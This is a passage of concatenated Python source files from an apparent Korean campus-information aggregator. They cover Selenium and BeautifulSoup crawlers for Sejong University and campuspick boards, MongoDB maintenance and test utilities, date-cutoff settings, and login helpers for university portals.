f.close()
```
#### File: modules/crawler/gz_test_modules.py
```python
import timeit
from datetime import timedelta
from datetime import datetime
import datetime
import time
from modules.crawler.etc.time_convert import datetime_to_mongo
from modules.crawler.etc.time_convert import mongo_to_datetime
from modules.crawler.list.date_cut import date_cut_dict_before
from modules.crawler.list import filtering
from modules.crawler.dbs.mongo.db_connect import connect_db, disconnect_db
from modules.crawler.list.url_list import List
from modules.crawler.login import campuspick
from modules.tokenizer import Tokenizer
from modules.recommender.fasttext import Recommender
import pymongo
from pymongo import MongoClient
from bs4 import BeautifulSoup
from selenium import webdriver
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from platform import platform
import os
import hashlib
TK = Tokenizer()
# FT (Recommender) class declaration
# FT = Recommender(os.getenv("SIGNUS_FT_MODEL_PATH"))
# timing check
start_time = 0
terminate_time = 0
# on-campus contests  : insideCampus
# off-campus contests : outsideCampus
# number of documents : limit
def getData(db, limit):
insideCampus = list(db.posts.find({
"$and": [
{ "tag": "공모전&대외활동" },
{ "tag": "교내"},
]
}).sort([('date', -1)]).limit(limit))
outsideCampus = list(db.posts.find({
"$and":[
{ "tag": {"$ne":"교내"} },
{ "tag": "공모전&대외활동" }
]
}).sort([('date', -1)]).limit(limit))
return insideCampus, outsideCampus
def init_db_date(db):
# date 값 싹 날려버리기
date_dict_list = list(db.date.find())
date_list = []
for item in date_dict_list:
date_list.append(item["crawler"])
for item in date_list:
db.date.remove({"crawler":item})
# -------------------------------------------------------------
# 해당 sj date 날려버리기
date_list = list(db.date.find({"crawler":"s"}))
db.date.remove({"crawler":"s"})
for date in date_list:
print(date)
# date_cut에 값 넣고 실행하기
def insert_db_date(db):
date_dict_list = list(db.date.find())
date_list = []
for item in date_dict_list:
date_list.append(item["crawler"])
date_list_before = list(date_cut_dict_before)
for date in date_list_before:
if date in date_list:
pass
else:
query = {
"crawler": date,
"date_exp": "2009-01-01 00:00:00"
}
db.date.insert_one(query)
# 특정 info 삭제
def remove_db_posts(db):
# INFO_LIST=["sig26_campuspick_activity","sig50_campuspick_parttime","sig27_campuspick_language","sig26_campuspick_contest","sig28_campuspick_club","sig55_campuspick_job"]
# for item in INFO_LIST:
# db.posts.remove({"info":item})
# db.recent_post.remove({"info_id":item})
db.posts.remove({"info":"sig54_naver_news"})
# posts DB삭제
def drop_db_collection(db):
INFO_LIST=["thinkgood_info","campuspick_activity","campuspick_contest","campuspick_language",\
"campuspick_job","campuspick_certificate","campuspick_study","campuspick_club","everytime_all",\
"detizen_contest","detizen_activity","jobkoreatip_tip","jobkorea_job","jobkorea_public",\
"rndjob_job","indeed_job","infor_notice","external_notice","review_data","addcampus_board",\
"20lab_column","20lab_infographics","20lab_announcement","20lab_data","20lab_report",\
"vms_volunteer","naver_news","campuspick_parttime","univ20_main","kosaf_info"]
posts = db.posts.find({},{"_id":False, "title":True, "date":True, "post":True, "tag":True,\
"img":True, "url":True, "info":True, "url_hashed":True, "hashed":True, "view":True,\
"fav_cnt":True, "title_token":True, "token":True, "login":True, "learn":True,\
"end_date":True, "topic":True, "ft_vector":True, "popularity":True})
post_list = list(posts)
post_cnt = len(post_list)
print("현재 게시글 개수 ::: ", post_cnt)
no_remove_data = []
remove_data = []
for post in post_list:
if post["info"] in INFO_LIST:
no_remove_data.append(post)
else :
remove_data.append(post)
print("지우면 안되는 데이터 개수 ::: ", len(no_remove_data))
print("지워야 할 데이터 개수 ::: ", len(remove_data))
print("합계 ::: ", len(no_remove_data) + len(remove_data))
if post_cnt == len(no_remove_data) + len(remove_data):
print("CLEAR")
db.posts.drop()
for data in no_remove_data:
db.posts.insert_one(data)
insert_posts_data = db.posts.count_documents({})
print("posts collection count ::: ", insert_posts_data)
def drop_all_collection(db):
db.crawler_log.drop()
db.crawler_manager.drop()
db.target_expire.drop()
db.domain.drop()
db.recent_post.drop()
db.post_info.drop()
db.posts.drop()
db.tag_info.drop()
db.url.drop()
db.category.drop()
def get_post_url(db):
except_info = ["sj20","sj30"]
info_list = []
none_list = [] #posts가 0개인 url들
total = 0
for url_list in List:
info_list.append({"info" : url_list['info'],"cnt":0})
for item in info_list:
crawling_name = item['info'].split("_")[0]
cnt = db.posts.find({"info":item['info']}).count()
item['cnt'] = cnt
if (cnt == 0) and (crawling_name not in except_info):
none_list.append(item)
total += cnt
print("--------------------------------------------------")
print("--------------------------------------------------")
print("::::::::::::::::URL별 POST 개수::::::::::::::::")
for i in info_list:
print(i['info'] + ' : ', i['cnt'] , '개')
print("--------------------------------------------------")
print("--------------------------------------------------\n\n")
print("POST 총 합 : ",total)
print("\n\n")
print("::::::::::::::::::::::::::::::::::::::::::::::::::")
print("::::::::::::::::posts 0 개인 URL들::::::::::::::::")
print("::::::::::::::::::::::::::::::::::::::::::::::::::")
print("::::::::::::::::::::::::::::::::::::::::::::::::::")
for i in none_list:
print(i['info'] + ' : ', i['cnt'] , '개')
print("::::::::::::::::::::::::::::::::::::::::::::::::::")
print("::::::::::::::::::::::::::::::::::::::::::::::::::")
def test_selenium():
options = webdriver.ChromeOptions()
options.add_argument('window-size=1920x1080')
options.add_argument("disable-gpu")
options.add_argument("user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5)AppleWebKit 537.36 (KHTML, like Gecko) Chrome")
options.add_argument("lang=ko_KR")
driver = webdriver.Chrome("C:/Users/82109/Desktop/SIGNUS/SIGNUS/modules/crawler/chromedriver_86.exe", options=options)
driver = campuspick.login(driver)
driver.get('https://www.campuspick.com/job')
scroll_cnt = 0
last_height = driver.execute_script("return document.body.scrollHeight")
while 1:
WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.CSS_SELECTOR, "p.badges"))) #div.header을 발견하면 에이작스 로딩이 완료됬다는 가정
driver.execute_script("window.scrollTo(0, document.body.scrollHeight);")
time.sleep(2)
driver.execute_script("window.scrollTo(0, document.body.scrollHeight-50);")
time.sleep(2)
new_height = driver.execute_script("return document.body.scrollHeight")
if new_height == last_height:
break
last_height = new_height
scroll_cnt = scroll_cnt + 1
print(scroll_cnt)
if scroll_cnt==20:
break
html = driver.page_source
bs = BeautifulSoup(html,'html.parser')
posts = bs.find("div", {"class": 'list'}).findAll("a", {"class": "top"})
print("포스트 개수 : ",len(posts))
# post와 info_num 매칭 함수
def matching_info_num(db):
for url in List:
info = url['info']
each_posts = list(db.posts.find({"info":info},{"_id":1})) #각각의 url별 모든 게시글 들을 가져온다.
each_info_num = db.post_info.find_one({"info_id" : url['info']})['info_num'] #각각의 url별 정해진 info_num 을 가져온다.
for post in each_posts:
db.posts.update_one(
{'_id': post['_id']},
{"$set": {"info_num": each_info_num}}
)
print(info," 완료!!")
#리토크나이저 함수
def retokenizer(db):
for url in List:
each_url_posts = list(db.posts.find(
{"info":url["info"]})
)
for post_one in each_url_posts:
if post_one["title"][-3:] == "..." and post_one["post"].startswith(post_one["title"][:-3]):
post_one["title_token"] = post_one["post"][:20].split(" ")
else:
post_one["title_token"] = post_one["title"].split(" ")
if post_one["post"].startswith(post_one["title"][:-3]):
post_one["token"] = TK.get_tk(post_one["post"].lower())
else:
post_one["token"] = TK.get_tk(post_one["title"].lower() + post_one["post"].lower())
post_one["token"] = list(url['title_tag'] + post_one["token"])
if 'token' in post_one:
topic_str = post_one["token"]
else:
topic_str = []
post_one["topic_vector"] = FT.doc2vec(topic_str).tolist()
db.posts.update_one(
{'_id':post_one['_id']},
{"$set":{
"title_token":post_one["title_token"],
"token":post_one["token"],
"topic_vector":post_one["topic_vector"]
}
}
)
if __name__ == '__main__':
database = connect_db()
db = database[1]
client = database[0]
#리토크나이저 로컬 테스트용
# retokenizer(db)
#셀레니움 테스트
# test_selenium()
#info num, info 정상매치 함수
# matching_info_num(db)
#각 url별 게시글 개수
get_post_url(db)
#signus db collection 전체 삭제
# drop_all_collection(db)
# posts 데이터 초기화
# drop_db_collection(db)
# posts 데이터 삭제
# remove_db_posts(db)
# date collection insert
# insert_db_date(db)
# date db초기화
# init_db_date(db)
# 세종대 관련 url 삭제 함수
# getPostCnt(db)
# 교내, 교외 공모전 데이터 함수
# start_time = timeit.default_timer()
# insideCampus, outsideCampus = getData(db, 300)
# terminate_time = timeit.default_timer()
# print("\n")
# print("test case 10개")
# print("<<교내 공모전 데이터 개수:",len(insideCampus),">>")
# print("------------------------------------------")
# for i in range(0,100):
# print(i+1,"번째 리스트의 타이틀 :",insideCampus[i]["title"])
# print(i+1,"번째 리스트의 태그 :",insideCampus[i]["tag"])
# print(i+1,"번째 리스트의 info :",insideCampus[i]["info"])
# print(i+1,"번째 리스트의 게시글 작성 날짜 :",insideCampus[i]["date"])
# print("------------------------------------------")
# print("\n")
# print("test case 10개")
# print("<<교외 공모전 데이터 개수:",len(outsideCampus),">>")
# print("------------------------------------------")
# for i in range(0,10):
# print(i+1,"번째 리스트의 타이틀 :",outsideCampus[i]["title"])
# print(i+1,"번째 리스트의 태그 :",outsideCampus[i]["tag"])
# print(i+1,"번째 리스트의 info :",outsideCampus[i]["info"])
# print(i+1,"번째 리스트의 게시글 작성 날짜 :",outsideCampus[i]["date"])
# print("------------------------------------------")
# print("\n교내 공모전 개수 + 교외 공모전 개수 =",len(insideCampus)," +",len(outsideCampus)," =",len(insideCampus)+len(outsideCampus))
# print("\n------------------------------------------")
# print("\n실행 속도 :",(terminate_time - start_time),"초")
# print("\n------------------------------------------")
```
#### File: crawler/list/date_cut.py
```python
from datetime import datetime, timedelta
from pymongo import MongoClient
now = datetime.now().strftime("%Y-%m-%d %H:%M:%S")
now_minus = datetime.now() + timedelta(days = -1)
now_minus = now_minus.strftime("%Y-%m-%d %H:%M:%S")
date_cut_dict = {}
date_cut_dict_before = {
# sj: Sejong University related
# sig: SIGNUS related
# deadline-based boards always crawl only up to the current time.
"sj1": "2009-01-01 00:00:00",\
"sj1_main_FAQ": "2006-01-01 00:00:00",\
"sj2": "2009-01-01 00:00:00",\
# deadline-based, so only crawl up to the current time
"sj3": now,\
# deadline-based, so only crawl up to the current time
"sj4": now,\
"sj5": "2009-01-01 00:00:00",\
"sj6": "2009-01-01 00:00:00",\
"sj7": "2009-01-01 00:00:00",\
"sj8": "2009-01-01 00:00:00",\
"sj9": "2009-01-01 00:00:00",\
"sj10": "2009-01-01 00:00:00",\
"sj11": "2009-01-01 00:00:00",\
"sj12": "2009-01-01 00:00:00",\
"sj13": "2009-01-01 00:00:00",\
"sj14": "2009-01-01 00:00:00",\
"sj15": "2009-01-01 00:00:00",\
"sj16": "2009-01-01 00:00:00",\
"sj17": "2009-01-01 00:00:00",\
"sj18": "2009-01-01 00:00:00",\
"sj19": "2009-01-01 00:00:00",\
"sj20": "2009-01-01 00:00:00",\
"sj21": "2009-01-01 00:00:00",\
"sj23": "2009-01-04 00:00:00",\
"sj24": "2009-01-01 00:00:00",\
# deadline-based, so only crawl up to the current time
"sig25": now,\
"sig26": now_minus,\
"sig27": now_minus,\
"sig28": now_minus,\
"sj29": "2009-01-01 00:00:00",\
"sj30": "2009-01-01 00:00:00",\
"sj31": now,\
"sj32": "2009-01-01 00:00:00",\
"sj33": "2009-01-01 00:00:00",\
"sj34": "2009-01-01 00:00:00",\
"sig35": now,\
"sig36": "2009-01-01 00:00:00",\
"sig37": now,\
"sj38": "2009-01-01 00:00:00",\
"sig39": "2009-01-01 00:00:00",\
"sj40": now,\
"sj41": "2009-01-01 00:00:00",\
"sj42": "2000-01-01 00:00:00",\
"sig43": "2009-01-01 00:00:00",\
"sj44": "2009-01-01 00:00:00",\
#SIGNUS
"sig45": "2009-01-01 00:00:00",\
"sig46": "2009-01-01 00:00:00",\
"sig47": "2009-01-01 00:00:00",\
"sig48": "2009-01-01 00:00:00",\
"sig50": "2009-01-01 00:00:00",\
"sig51": "2009-01-01 00:00:00",\
"sig52": "2009-01-01 00:00:00",\
"sig53": "2009-01-01 00:00:00",\
"sig54": "2009-01-01 00:00:00",\
"sig55": now_minus,\
"sig56": "2009-01-01 00:00:00",\
"sig57": "2009-01-01 00:00:00",\
}
def date_init(db):
date_db = db.target_expire.find()
for date_one in date_db:
date_cut_dict[date_one['crawler']] = date_one['expire_date']
def date_cut(info):
if info.split("_")[2].find("FAQ") != -1: #FAQ이므로 전체긁기를 위해 예외처리
end_date = date_cut_dict['sj1_main_FAQ']
else:
name = info.split("_")[0]
end_date = date_cut_dict[name]
return end_date
```
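A minimal usage sketch of the two helpers above, assuming a MongoDB handle is already available; the crawler name and the three-part `info` string ("sj14_main_notice") are made-up values for illustration only.
```python
# hypothetical wiring; db must expose a target_expire collection as date_init expects
from modules.crawler.list.date_cut import date_init, date_cut

date_init(db)                              # fills date_cut_dict from db.target_expire
end_date = date_cut("sj14_main_notice")    # -> expire date registered for crawler "sj14"
```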
#### File: crawler/login/daum.py
```python
import requests
from modules.crawler.login import all_login
import time
login_data = all_login.daum()
ID = login_data[0]
PW = login_data[1]
# login code
def login(driver):
#driver.get('https://logins.daum.net/accounts/loginform.do') # old version
driver.get('https://logins.daum.net/accounts/signinform.do') # updated version
driver.implicitly_wait(3)
#### send the login credentials ####
driver.find_element_by_name('id').send_keys(ID)
driver.find_element_by_name('pw').send_keys(PW)
#### click the login button ####
driver.find_element_by_xpath('//*[@id="loginBtn"]').click()
time.sleep(3)
return driver
```
#### File: crawler/sj_crawling/sig55.py
```python
from bs4 import BeautifulSoup
from selenium import webdriver
import datetime
from modules.crawler.login import campuspick
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.keys import Keys
import time
from modules.crawler.etc.driver_agent import chromedriver
from modules.crawler.list.url_list import List
from modules.crawler.list.date_cut import date_cut
from modules.crawler.etc.post_wash import post_wash
from modules.crawler.etc.img_size import img_size
# given a board page_url, return the post urls on that page
def Parsing_list_url(URL, page_url, driver):
List = []
# quit the driver if one is already running, otherwise just continue
try:
driver.quit()
except:
pass
driver = chromedriver()
# campuspick login
driver = campuspick.login(driver)
List.append(page_url)
data = (driver, List)
return data
# given a post url, return that post's data as a dictionary
def Parsing_post_data(driver, post_url, URL, recent_post):
post_data_prepare = []
domain = Domain_check(URL['url'])
end_date = date_cut(URL['info'])
now_num = 0
end_dday = 0
driver.get(post_url)
post_driver = chromedriver()
post_driver = campuspick.login(post_driver)
last_posts = [0]
flag = 0 # set when the loop ends because of consecutive closed postings
while 1:
if (now_num > 0) and (now_num % 100 == 0):
print("post_driver를 재시작 합니다.")
post_driver.close()
post_driver = chromedriver() # 포스트 페이지를 위한 드라이버
post_driver = campuspick.login(post_driver)
driver.find_element_by_tag_name("body").send_keys(Keys.END)
time.sleep(1)
html = driver.page_source
bs = BeautifulSoup(html, 'html.parser')
posts = bs.find("div", {"class": 'list'}).findAll("a", {"class": "top"})
# break when the page cannot be scrolled any further
if len(last_posts) == len(posts):
break
else:
last_posts = posts
for post in posts[now_num:]:
if end_dday == 20: # stop after 20 closed postings in a row
flag = 1
break
try:
post_data = {}
url = post['href']
url = domain + url
try:
post_driver.get(url)
#driver.get(url)
except:
if len(post_data_prepare) == 0:
recent_post = None
else:
recent_post = post_data_prepare[0]['title']
data = (post_data_prepare, recent_post)
return data
try:
WebDriverWait(post_driver, 30).until(EC.presence_of_element_located((By.CSS_SELECTOR, "p.company"))) # assume the Ajax load is complete once "p.company" is present
except Exception as e:
print(e)
except:
if len(post_data_prepare) == 0:
recent_post = None
else:
recent_post = post_data_prepare[0]['title']
data = (post_data_prepare, recent_post)
return data
html_post = post_driver.page_source
bs_post = BeautifulSoup(html_post, 'html.parser')
title = bs_post.find("p",{"class":"company"}).get_text(" ", strip = True) + bs_post.find("div",{"class":"content figure"}).find("h1").get_text(" ",strip = True)
date = bs_post.find("div", {"class": "section"}).find("p", {"class": "indent"}).text.strip()
date = date.split("~")[1]
date = date.split("(")[0]
date = date[1:]
now_year = datetime.datetime.now().strftime("%Y")
date = now_year + "년 " + date + " 00:00:00"
date = str(datetime.datetime.strptime(date, "%Y년 %m월 %d일 %H:%M:%S"))
post_content = bs_post.find("div", {'id': "container"}).findAll("div",{"class":"section"})
post_content = post_content[0].get_text(" ", strip = True)+post_content[1].get_text(" ",strip = True)
post_content = post_wash(post_content) # strip all whitespace from the post body
dead_line = str((bs_post.find("p",{"class":"dday"}).get_text(" ",strip=True)))
if dead_line == "마감":
end_dday = end_dday + 1
else:
end_dday = 0
post_data['title'] = title.upper()
post_data['author'] = ''
post_data['date'] = date
post_data['post'] = post_content.lower()
post_data['img'] = 7
post_data['url'] = url
print(date, "::::", title)
if (date < end_date) or (title.upper() == recent_post):
break
else:
post_data_prepare.append(post_data)
except:
continue
now_num = len(posts)
print("now_num : ", now_num)
if (flag == 1) or (title.upper() == recent_post):
break
if len(post_data_prepare) == 0:
recent_post = None
else:
recent_post = post_data_prepare[0]['title']
data = (post_data_prepare, recent_post)
post_driver.close()
return data
# returns the url unchanged => this url does not need a page number
def Change_page(url, page):
return url
# return the domain of the given url
def Domain_check(url):
domain = url.split('/')[0] + '//' + url.split('/')[2] # extract the domain url
return domain
```
#### File: crawler/sj_crawling/sj14.py
```python
import datetime
from modules.crawler.list.url_list import List
from modules.crawler.list.date_cut import date_cut_dict
from modules.crawler.etc.post_wash import post_wash
from modules.crawler.etc.img_size import img_size
# given page n of a board, return the list of post urls on that page
def Parsing_list_url(URL, bs):
List = []
domain = Domain_check(URL['url'])
posts = bs.find("div", {"id": "list_board"}).find("ul", {"class": "lst-board lst-body"}).findAll("li")
for post in posts:
url = post.find("a")['href']
url = domain + url
List.append(url)
return List
# given a post url, return that post's data as a dictionary
def Parsing_post_data(bs, post_url, URL):
return_data = []
post_data = {}
domain = Domain_check(URL['url'])
title = bs.find("div", {"id": "scbd"}).find("div", {"class": "title"}).get_text(" ", strip = True)
author = bs.find("div", {"id": "scbd"}).find("dl").find("span").text.strip()
if author.find("관리자") != -1:
author = "0"
date = bs.find("div", {"id": "scbd"}).find("dl").find("dd").text.strip()
date = str(datetime.datetime.strptime(date, "%Y-%m-%d %H:%M:%S"))
post = bs.find("div", {"id": "conbody"}).get_text(" ", strip = True)
post = post_wash(post) # strip all whitespace from the post body
if bs.find("div", {"id": "conbody"}).find("img") is None:
img = 1
else:
img = bs.find("div", {"id": "conbody"}).find("img")['src'] # grab the first image in the post
if 1000 <= len(img):
img = 1
else:
if img.startswith("http://") or img.startswith("https://"): # decide whether img is an internal or an external link
pass
elif img.startswith("//"):
img = "http:" + img
else:
img = domain + img
if img != 1:
if img_size(img):
pass
else:
img = 1
post_data['title'] = title.upper()
post_data['author'] = author.upper()
post_data['date'] = date
post_data['post'] = post.lower()
post_data['img'] = img
post_data['url'] = post_url
return_data.append(post_data)
return_data.append(title)
return_data.append(date)
return return_data
# append the page number to the url and return the result
def Change_page(url, page):
url_done = url + str(page)
return url_done
# return the domain of the given url :::: for sj10 only, this extracts up to /bbs/
def Domain_check(url):
domain = url.split('/')[0] + '//' + url.split('/')[2] # extract the domain url
return domain
```
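The sj* crawler modules above all expose the same three functions, so a driver script presumably wires them together roughly as below; the URL dictionary fields, the placeholder board address, and the requests-based fetch are assumptions based only on how `URL['url']` and `URL['info']` are used in this file.
```python
# hypothetical driver loop for a module like sj14
import requests
from bs4 import BeautifulSoup
from modules.crawler.sj_crawling import sj14

URL = {"url": "https://board.example.com/list?page=", "info": "sj14_main_notice"}
page_url = sj14.Change_page(URL["url"], 1)                        # board url for page 1
bs = BeautifulSoup(requests.get(page_url).text, "html.parser")
for post_url in sj14.Parsing_list_url(URL, bs):
    post_bs = BeautifulSoup(requests.get(post_url).text, "html.parser")
    post_data, title, date = sj14.Parsing_post_data(post_bs, post_url, URL)
```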
#### File: crawler/sj_crawling/sj29.py
```python
from bs4 import BeautifulSoup
import datetime
from modules.crawler.login import everytime
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import time
from modules.crawler.etc.driver_agent import chromedriver
from modules.crawler.list.url_list import List
from modules.crawler.list.date_cut import date_cut
from modules.crawler.etc.post_wash import post_wash
from modules.crawler.etc.img_size import img_size
# given a board page_url, return the post urls on that page
def Parsing_list_url(URL, page_url, driver):
List = []
domain = Domain_check(URL['url'])
# quit the driver if one is already running, otherwise just continue
try:
driver.quit()
except:
pass
driver = chromedriver()
driver.get(page_url)
WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.CSS_SELECTOR, "span.li_list")))
time.sleep(2)
'''
for i in range(int(num)):
driver.find_element_by_xpath('//*[@id="paging"]/li[4]/a').click()
WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.CSS_SELECTOR, "span.li_num")))
'''
html = driver.page_source
bs = BeautifulSoup(html, 'html.parser')
try:
posts1 = bs.find("ul", {"class": 'listContent'}).findAll("li")
posts2 = bs.find("ul", {"class": 'listContent mb20'}).findAll("li")
posts = posts1 + posts2
except:
try:
posts1 = bs.find("ul", {"class": 'listContent'}).findAll("li")
posts2 = bs.find("ul", {"class": 'listContent mb20'}).findAll("li")
posts = posts1 + posts2
except:
data = (driver, List)
return data
try:
for post in posts:
url = post.find("span", {"class": "li_subject li_list2"}).find("a")['onclick']
url = url.split("'")[1]
url = domain + url
List.append(url)
except:
List = []
data = (driver, List)
return data
# given a post url, return that post's data as a dictionary
def Parsing_post_data(driver, post_url, URL):
return_data = []
post_data = {}
try:
driver.get(post_url)
time.sleep(0.5) # nothing reliable to wait on, so sleep 0.5 s; raise toward ~3 s depending on network and machine speed
html = driver.page_source
bs = BeautifulSoup(html, 'html.parser')
title = bs.find("li", {"class": "vi_subject vi_title"}).get_text(" ", strip = True)
author = bs.find("span", {"id": "regname"}).text.strip()
date = bs.find("span", {"id": "regdate"}).text.strip()
date = date + " 00:00:00"
date = str(datetime.datetime.strptime(date, "%Y-%m-%d %H:%M:%S"))
post = bs.find("li", {"id": "contents"}).get_text(" ", strip = True)
post = post_wash(post) # strip all whitespace from the post body
img = 1
except:
driver.get(post_url)
time.sleep(0.5) # nothing reliable to wait on, so sleep 0.5 s; raise toward ~3 s depending on network and machine speed
html = driver.page_source
bs = BeautifulSoup(html, 'html.parser')
title = bs.find("li", {"class": "vi_subject vi_title"}).text.strip()
author = bs.find("span", {"id": "regname"}).text.strip()
date = bs.find("span", {"id": "regdate"}).text.strip()
date = date + " 00:00:00"
date = str(datetime.datetime.strptime(date, "%Y-%m-%d %H:%M:%S"))
post = bs.find("li", {"id": "contents"}).text.strip()
post = post_wash(post) # strip all whitespace from the post body
img = 1
post_data['title'] = title.upper()
post_data['author'] = author.upper()
post_data['date'] = date
post_data['post'] = post.lower()
post_data['img'] = img
post_data['url'] = post_url
return_data.append(post_data)
return_data.append(title)
return_data.append(date)
return return_data
# append the page number to the url and return the result
def Change_page(url, page):
url_done = url + str(page)
return url_done
# return the domain of the given url
def Domain_check(url):
# post url format for the Happy Dormitory (happydorm) board
domain = "https://happydorm.sejong.ac.kr/sejong/bbs/getBbsWriteView.kmc?&bbs_id=notice&seq="
return domain
```
#### File: crawler/sj_crawling/sj42.py
```python
from bs4 import BeautifulSoup
import datetime
from modules.crawler.list.url_list import List
from modules.crawler.list.date_cut import date_cut_dict
from modules.crawler.etc.post_wash import post_wash
from modules.crawler.etc.img_size import img_size
now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
# given a board page_url, return the post urls on that page
def Parsing_list_url(URL, bs):
List = []
domain = Domain_check(URL['url'])
# build the list of post urls
posts = bs.find("table", {"class": 'bbs_ltype tbl30'}).findAll("tr")
posts = posts[1:]
for post in posts:
target = post.find("a")['href']
page = domain + "/" + target
List.append(page)
return List
# given a post url, return that post's data as a dictionary
def Parsing_post_data(bs, post_url, URL):
return_data = []
post_data = {}
title = bs.find("div", {"class": "view_subject"}).find("h5").get_text(" ", strip = True)
author = bs.find("ul", {"class": "data"}).find("li").text.strip()
date = now
date = str(datetime.datetime.strptime(date, "%Y-%m-%d %H:%M:%S"))
post = bs.find("div", {"class": "view_contents"}).get_text(" ", strip = True)
post = post_wash(post)
img = 1
post_data['title'] = title.upper()
post_data['author'] = author.upper()
post_data['date'] = date
post_data['post'] = post.lower()
post_data['img'] = img
post_data['url'] = post_url
return_data.append(post_data)
return_data.append(title)
return_data.append(date)
return return_data
# append the page number to the url and return the result
def Change_page(url, page):
url_done = url + str(page)
return url_done
# return the domain of the given url
def Domain_check(url):
domain = url.split('/')[0] + '//' + url.split('/')[2] + "/" + url.split('/')[3] # extract the domain url
return domain
```
#### File: crawler/sj_crawling/sj5.py
```python
from bs4 import BeautifulSoup
import datetime
from modules.crawler.login import udream
from modules.crawler.list.url_list import List
from modules.crawler.list.date_cut import date_cut_dict
from modules.crawler.etc.post_wash import post_wash
from modules.crawler.etc.img_size import img_size
# given a board page_url, return that page url
def Parsing_list_url(URL, page_url):
List = []
List.append(page_url)
return List
# given a post url, return that post's data as a dictionary
def Parsing_post_data(post_url, URL):
post_data_prepare = []
end_date = date_cut_dict['sj5'] # look up end_date
# log in to udream
s = udream.login()
page = s.get(post_url).text
bs = BeautifulSoup(page, "html.parser")
posts = bs.find("tbody").findAll("tr") # the table rows
for post in posts:
post_infoes = post.findAll("td") # the table cells
post_data = {}
title = post_infoes[0].get_text(" ", strip = True)
author = post.find("div").text.strip()
if author.find("관리자") != -1:
author = "0"
date = post_infoes[3].text + " 00:00:00"
date = str(datetime.datetime.strptime(date, "%Y-%m-%d %H:%M:%S"))
phrase = post_infoes[1].text + post_infoes[2].get_text(" ", strip = True)
phrase = post_wash(phrase)
img = 1
url_num = str(post_infoes[4].find("a")).split('"')[3]
url = URL['post_url'] + url_num
post_data['title'] = title.upper()
post_data['author'] = author.upper()
post_data['date'] = date
post_data['post'] = phrase.lower()
post_data['img'] = img
post_data['url'] = url
print(date, "::::", title)
# skip posts older than end_date, append the newer ones
if str(date) <= end_date:
continue
else:
post_data_prepare.append(post_data)
s.close()
return post_data_prepare
# append the page number to the url and return the result
def Change_page(url, page):
url_done = url + str(page)
return url_done
# return the domain of the given url
def Domain_check(url):
domain = url.split('/')[0] + '//' + url.split('/')[2] # extract the domain url
return domain
```
#### File: crawler/sj_crawling/sj8.py
```python
from bs4 import BeautifulSoup
from modules.crawler.etc.url_parser import URLparser
import datetime
from modules.crawler.list.url_list import List
from modules.crawler.list.date_cut import date_cut
from modules.crawler.etc.post_wash import post_wash
from modules.crawler.etc.img_size import img_size
# given a board bs_page, return that bs_page
def Parsing_list_url(URL, bs_page):
List = []
List.append(bs_page)
return List
# given a post url, return that post's data as a dictionary
def Parsing_post_data(bs, URL):
post_data_prepare = []
end_date = date_cut(URL['info'])
posts = bs.findAll("div", {"class": "item article"})
for post in posts:
post_infoes = post.findAll("a") #td 묶음
post_data = {}
try:
title = post_infoes[0].get_text(" ", strip = True)
author = post.find("strong").text.strip()
if author.find("관리자") != -1:
author = "0"
date = post.find("span", {"class": "date"})
date = str(date).split(">")[1]
date = str(date).split("<")[0]
date = date + " 00:00:00"
except:
title = post_infoes[0].get_text(" ", strip = True)
try:
author = post.find("strong").text.strip()
except:
author = "0"
if author.find("관리자") != -1:
author = "0"
date = post.find("span", {"class": "date"})
date = str(date).split(">")[1]
date = str(date).split("<")[0]
date = date + " 00:00:00"
try:
date = str(datetime.datetime.strptime(date, "%Y-%m-%d %H:%M:%S"))
except:
date = datetime.datetime.now().strftime("%Y-%m-%d")
date = date + " 00:00:00"
try:
phrase = post_infoes[1].get_text(" ", strip = True)
except:
phrase = "0"
phrase = post_wash(phrase)
url = post.find("a")["href"]
# open the news url to fetch an image
domain = Domain_check(url) # domain of the news url
driver_page = URLparser(url)
bs_page = BeautifulSoup(driver_page, 'html.parser')
try:
img = bs_page.find("head").find("meta", {"property": "og:image"})['content']
except:
try:
if bs_page.find("body").find("img") is None:
img = 1
else:
img = bs_page.find("body").find("img")['src']
if 1000 <= len(img):
img = 1
else:
if img.startswith("http://") or img.startswith("https://"): # img가 내부링크인지 외부 링크인지 판단.
pass
elif img.startswith("//"):
img = "http:" + img
else:
img = domain + img
except:
img = 1
if img != 1:
if img_size(img):
pass
else:
img = 1
post_data['title'] = title.upper()
post_data['author'] = author.upper()
post_data['date'] = date
post_data['post'] = phrase.lower()
post_data['img'] = img
post_data['url'] = url
print(date, "::::", title)
# skip posts older than end_date, append the newer ones
if str(date) <= end_date:
continue
else:
post_data_prepare.append(post_data)
return post_data_prepare
# append the page number to the url and return the result
def Change_page(url, page):
url_done = url + str(page)
return url_done
# return the domain of the given url
def Domain_check(url):
domain = url.split('/')[0] + '//' + url.split('/')[2] # extract the domain url
return domain
```
#### File: modules/SJ_Auth/sj_auth.py
```python
import requests
from bs4 import BeautifulSoup as bs
import getpass
header = {"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5)\
AppleWebKit 537.36 (KHTML, like Gecko) Chrome",
"Accept":"text/html,application/xhtml+xml,application/xml;\
q=0.9,imgwebp,*/*;q=0.8"}
do_url = "https://do.sejong.ac.kr/ko/process/member/login"
TIMEOUT_SEC = 3
def sjlms_api(id, pw):
data = {"username":id, "password":pw, "rememberusername":"1"}
with requests.Session() as s:
page = s.post("http://sjulms.moodler.kr/login/index.php",
headers = header, data = data, timeout=TIMEOUT_SEC)
soup = bs(page.text, "html.parser")
if soup.find("h4") is None:
return {"result":False}
else:
name = soup.find("h4").get_text()
major = soup.find("p",{"class":"department"}).get_text()
return {
"result":True,
"name":name,
"id":id,
"major":major
}
def dosejong_api(id, pw):
data = {
#POST
"email":id,
"password":pw
}
with requests.Session() as s:
html = s.post(do_url, headers = header, data = data, timeout=TIMEOUT_SEC).content
html = s.get("https://do.sejong.ac.kr/", timeout=TIMEOUT_SEC).text
soup = bs(html, "html.parser")
